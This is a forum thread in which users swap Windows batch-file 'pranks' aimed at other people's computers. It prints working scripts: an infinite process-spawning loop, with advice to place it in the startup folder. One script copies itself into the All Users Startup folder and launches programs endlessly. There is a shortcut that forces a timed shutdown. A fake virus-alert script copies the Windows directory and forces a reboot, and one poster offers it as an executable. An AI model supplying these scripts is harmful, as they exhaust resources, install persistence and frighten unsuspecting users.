![]() |
|
|
#1 |
|
Newbie
|
Batch Files
Anyone know any cool batch files....maybe pranks?
|
|
|
|
|
|
#2 |
|
News Reporter
![]() |
Re: Batch Files
Hmm, try this code:
Code:
echo off :A start goto a ~1mAn3rd
__________________
--1mAn3rd |
|
|
|
| Thanked Users: | peter kiarie (14-05-2008) |
|
|
#3 |
|
Newbie
Join Date: Apr 2008
Posts: 9
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 0
![]() |
Re: Batch Files
And then you could take 1mAn3rd's code, create a batch file and put that in the Windows startup menu. LOL
|
|
|
|
|
|
#4 |
|
Newbie
|
Re: Batch Files
i already know tht one...someone posted it before...thanks though
|
|
|
|
|
|
#5 |
|
Newbie
Join Date: Feb 2008
Posts: 4
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 0
![]() |
Re: Batch Files
do not use it
may be this hearmfull 4 ur com |
|
|
|
|
|
#6 |
|
News Reporter
![]() |
Re: Batch Files
nirjhar, that code is not harmful to your computer. And I know that someone posted this before
but this is a simplified version, whereas in the other version they just pasted 'start cmd.exe' on a bunch of lines. This is an infinite loop. I am pretty good with DOS scripting, but not extremely good. Good luck finding different tricks.Another trick, right click on the desktop, click create shortcut, and in the field where you put where the shortcut leads to, type this: Code:
shutdown -s -t 10 -c "HAHA Got you ;)" Start > Run > shutdown -a and click Ok. That's it I don't know too many 'pranks' with the command prompt, and most of them would be somewhat harmful.
__________________
--1mAn3rd Last edited by 1mAn3rd; 18-05-2008 at 08:44 PM.. |
|
|
|
| Thanked Users: | Wolfie276 (09-05-2008) |
|
|
#7 |
|
Junior Member (25+)
Join Date: Mar 2008
Location: lebanon
Age: 16
Posts: 71
Thanks: 1
Thanked 1 Time in 1 Post
Rep Power: 0
![]() OS:
|
Re: Batch Files
@echo off
copy %1 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" :1 start cmd start iexplore.exe start explorer.exe goto 1
__________________
u think that i helped u with this post? reputate me!!! |
|
|
|
|
|
#8 |
|
Advanced Member (250+)
Join Date: Nov 2007
Location: /etc/init.d/
Posts: 441
Thanks: 15
Thanked 7 Times in 7 Posts
Rep Power: 0
![]() OS:
|
Re: Batch Files
meh...just do a simple 1 like a batch file with red font and saying u need 2 reformat every startup cuz of infection
color 04 (if im not wrong on the colors) echo You have been infected. echo. echo You will need to reformat to get rid of the infection. echo. echo WARNING: IF YOU DO NOT REFORMAT NOW THIS INFECTION echo WILL DELETE EVERY WINDOWS FILE AND YOU WILL NOT BE echo ABLE TO START UP NEXT TIME! echo. echo DELETING FILES IN %WINDIR% MKDIR C:\WIN xcopy /E %windir% C:\WIN cls shutdown -r -t 10 "No really...the files arent deleted."
__________________
(\__/) (='.'=) This is Bunny. Copy and paste bunny into your (" )_(" ) signature to help him gain world domination. http://www.youtube.com/watch?v=ZXD4N_Mi1iE&fmt=22# Freelancer Evolving |
|
|
|
|
|
#9 |
|
News Reporter
![]() |
Re: Batch Files
xD Wolfie, what is the point of that batch file? For one thing, you didn't give the user the chance to see the first text... and some people won't know to delete the text after the color. And I wouldn't be scared at all if this was a batch file because if you reformat your computer, it won't start anyway... so here, lemme edit that for you a bit
![]() Code:
echo off cls color 0C echo Windows has found a virus... echo. echo It is recommended to let Windows fix this issue. echo. echo If you do not let Windows fix this issue, echo the next time you restart the computer echo Windows will not load properly. set /p m=Would you like Windows to fix this issue? (Y/N): cls echo Deleting files in %WINDIR%. PING 1.1.1.1 -n 1 -w 500 >NUL cls echo Deleting files in %WINDIR%.. PING 1.1.1.1 -n 1 -w 500 >NUL cls echo Deleting files in %WINDIR%... PING 1.1.1.1 -n 1 -w 500 >NUL cls if exist "C:\WIN" goto start MKDIR "C:\WIN" :start xcopy /E /Y %windir% "C:\WIN" cls shutdown -r -t 10 -c "Windows has succesfully fixed the issue." ![]() PS: I have attached a zip file including the executable version of this script.
__________________
--1mAn3rd Last edited by 1mAn3rd; 31-05-2008 at 10:19 PM.. |
|
|
|
|
|
#10 |
|
Advanced Member (250+)
Join Date: Nov 2007
Location: /etc/init.d/
Posts: 441
Thanks: 15
Thanked 7 Times in 7 Posts
Rep Power: 0
![]() OS:
|
Re: Batch Files
forgot a Pause > NUL
Code:
color 04 echo You have been infected. echo. echo You will need to reformat to get rid of the infection. Pause > NUL echo. echo WARNING: IF YOU DO NOT REFORMAT NOW THIS INFECTION echo WILL DELETE EVERY WINDOWS FILE AND YOU WILL NOT BE echo ABLE TO START UP NEXT TIME! Pause > NUL echo. echo DELETING FILES IN %WINDIR% MKDIR C:\WIN xcopy /E %windir% C:\WIN cls shutdown -r -t 10 "No really...the files arent deleted." |
|
|
|
![]() |
| Thread Tools | |
| Display Modes | |
|
|
< Windows Help - MS Office Help - Hardware Support >
| New To Site? | Need Help? |